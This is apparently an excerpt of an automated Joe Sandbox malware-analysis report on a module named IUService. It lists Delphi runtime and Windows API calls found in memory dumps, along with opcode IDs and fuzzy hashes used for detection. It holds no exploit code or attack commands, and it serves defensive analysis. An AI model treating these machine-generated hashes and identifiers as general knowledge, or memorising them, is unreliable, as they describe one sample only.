                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015AB9), ref: 50015A7B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,50015AB9), ref: 50015A93
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • API ID: System@$System@@Unicode$AnsiFromStr$qqrr20StringStringx27System@%T$us$i0$%$InternalLength$qqrr20Move$qqrpxvpviStringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 986796861-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(?,?,?), ref: 50009611
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?,?), ref: 5000964A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • API ID: System@@$CharClr$qqrpvFreeFromLen$qqrr17StringStringpbiSystem@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4035486651-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027895
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278C2
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278EE
                                                                                                                                            • @Sysutils@ByteToCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027920), ref: 50027903
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50027927), ref: 5002791A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$ByteCharClr$qqrpvIndex$qqrx27Ref$qqrpvSysutils@T$us$i0$%i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4214602929-0
                                                                                                                                            • Opcode ID: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                                                            • Instruction ID: c3c75d1b48e19cc3e1f6b6390753f07d084fbfb0e8c4f9dbf7f6214b8e7eb97a
                                                                                                                                            • Opcode Fuzzy Hash: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                                                            • Instruction Fuzzy Hash: D511A030B01286EFAB05DFB8EB5697DB3F9EB482007A04275E508D3655EB70EE40D750
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027968
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027992
                                                                                                                                            • @Sysutils@ByteToCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 500279A7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteCharIndex$qqrx20StringiSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1663083771-0
                                                                                                                                            • Opcode ID: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                                                            • Instruction ID: aa1a79b2077093aec0dc215978b6579e0673518319e3e08c2949f697f48abfbb
                                                                                                                                            • Opcode Fuzzy Hash: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                                                            • Instruction Fuzzy Hash: EC112E30701286DFAF01CFAAEA42969B7F9EB88200BA042B6E508D3655E770EE40D650
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A1CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Unicode$Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringStringi$AnsiAsg$qqrr20FreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr20String$qqriStringx20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 87712638-0
                                                                                                                                            • Opcode ID: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                                                            • Instruction ID: 79869a9546d8ae15c7d4563ffc226c392f69356ca43a144d6d3bba8582a221f3
                                                                                                                                            • Opcode Fuzzy Hash: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                                                            • Instruction Fuzzy Hash: C901B5347435A14BFB18E649D471B6AB3F3AFD6210FE4C71AA6058B249DAB09C41C782
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 5001C059
                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 5001C062
                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileTime$Array$qqrr20DateErrorFindFromLastLocalNextStringpbiSystem@System@@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2911837428-0
                                                                                                                                            • Opcode ID: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                                                            • Instruction ID: 5728537e3c39e6084da27139d89328dfbbaad40690f3e6d11adc8d77ec81f8e3
                                                                                                                                            • Opcode Fuzzy Hash: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                                                            • Instruction Fuzzy Hash: D6115BB26041809FDB45DFA8D8C1C87B3ECAF8C21075586A2ED48DF24AE630D9508BA1
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A7D5), ref: 5001A780
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A7D5), ref: 5001A79F
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A7D5), ref: 5001A7BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983657741-0
                                                                                                                                            • Opcode ID: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                                                            • Instruction ID: 6fc85c46829d5016a76dc39be3afba1c4c63ccbbd777daa4708c9c8809dd5562
                                                                                                                                            • Opcode Fuzzy Hash: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                                                            • Instruction Fuzzy Hash: 89116534A04298EFDB11DFA8DD9199DB7F8EF4A210B6043B6E500D36D1E7749F80D681
                                                                                                                                            APIs
                                                                                                                                            • @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 50007749
                                                                                                                                              • Part of subcall function 50007234: GetCurrentThreadId.KERNEL32 ref: 50007238
                                                                                                                                              • Part of subcall function 50007234: @System@Error$qqr20System@TRuntimeError.RTL120 ref: 50007243
                                                                                                                                            • @System@TMonitor@QueueWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(00000000,500077CE), ref: 50007773
                                                                                                                                            • @System@TMonitor@Exit$qqrv.RTL120(00000000,500077CE), ref: 50007781
                                                                                                                                              • Part of subcall function 500074A4: @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 500074AA
                                                                                                                                              • Part of subcall function 500074A4: @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500074D9
                                                                                                                                            • @System@TMonitor@Enter$qqrui.RTL120(?), ref: 500077A2
                                                                                                                                              • Part of subcall function 5000730C: @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                                                              • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007343
                                                                                                                                              • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007355
                                                                                                                                            • @System@TMonitor@RemoveWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(?), ref: 500077AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Monitor@$Thread$CheckCountOwningThread$qqrvTickWaiter$qqrr30Waiting$CurrentEnter$qqruiEnter$qqrvErrorError$qqr20Event$qqrvExit$qqrvQueueRemoveRuntime
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028410
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 5002842B
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028439
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A86A), ref: 5001A81D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A86A), ref: 5001A837
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A86A), ref: 5001A84F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500158BE), ref: 50015874
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500158BE), ref: 50015891
                                                                                                                                            • @Sysutils@AnsiSameStr$qqrx20System@UnicodeStringt1.RTL120(?,00000000,500158BE), ref: 5001589C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiSystem@@$FromStr$qqrr20StringStringx27System@%T$us$i0$%$Copy$qqrx20InternalSameStr$qqrx20StringiiStringt1Sysutils@
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50034B1F
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,50034BA6,?,?,?), ref: 50034B50
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50034BA6,?,?,?), ref: 50034B5C
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50034BA6,?,?,?), ref: 50034B6E
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50034B90,00000000,50034BA6,?,?,?), ref: 50034B83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$From$AnsiCharChar$qqrr20Check$qqrlususClear$qqrr8Copy$qqrx20DataInitInternalLen$qqrr20ResultStr$qqrr20StringStringiiStringpbStringpbiStringx27System@%T$us$i0$%VariantVariants@Variants@@
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                                                            • @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20InternalUtf8$qqrpcuipbui
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779820642-0
                                                                                                                                            • Opcode ID: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                                                            • Instruction ID: e04ebdc101fc4bf289a004674db906102c3d27fd8c3307898635fa4b721bd642
                                                                                                                                            • Opcode Fuzzy Hash: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                                                            • Instruction Fuzzy Hash: A1017534611A85BFBB11CFB9D9B199AB7F9EF492007D04677E504D3601EA30EE01D660
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B17B
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B189
                                                                                                                                              • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                                                              • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                                                            • @Sysutils@Supports$qqrx45System@%DelphiInterface$t17System@IInterface%rx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B199
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B1A8
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(5002B1D6,?,?,?,00000000), ref: 5002B1C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$Clear$qqrr45Interface%IntfObject@System@@$Interface$qqrrx5_$Entry$qqrrx5_InterfaceInterface%rx5_Supports$qqrx45Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3577717398-0
                                                                                                                                            • Opcode ID: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                                                            • Instruction ID: 3f1c98fecfe68b52bf16856e5ff3d398f0e3bde1a59a24ad800dfe1f19cdd018
                                                                                                                                            • Opcode Fuzzy Hash: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                                                            • Instruction Fuzzy Hash: 6CF0F9303062855BEB04EBA5FC7295AB3DECF99358BD14276A900C3303DA60DC254690
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A99F,?,00000000), ref: 5002A940
                                                                                                                                              • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                                                              • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A99F,?,00000000), ref: 5002A962
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002A99F,?,00000000), ref: 5002A978
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5002A99F,?,00000000), ref: 5002A984
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
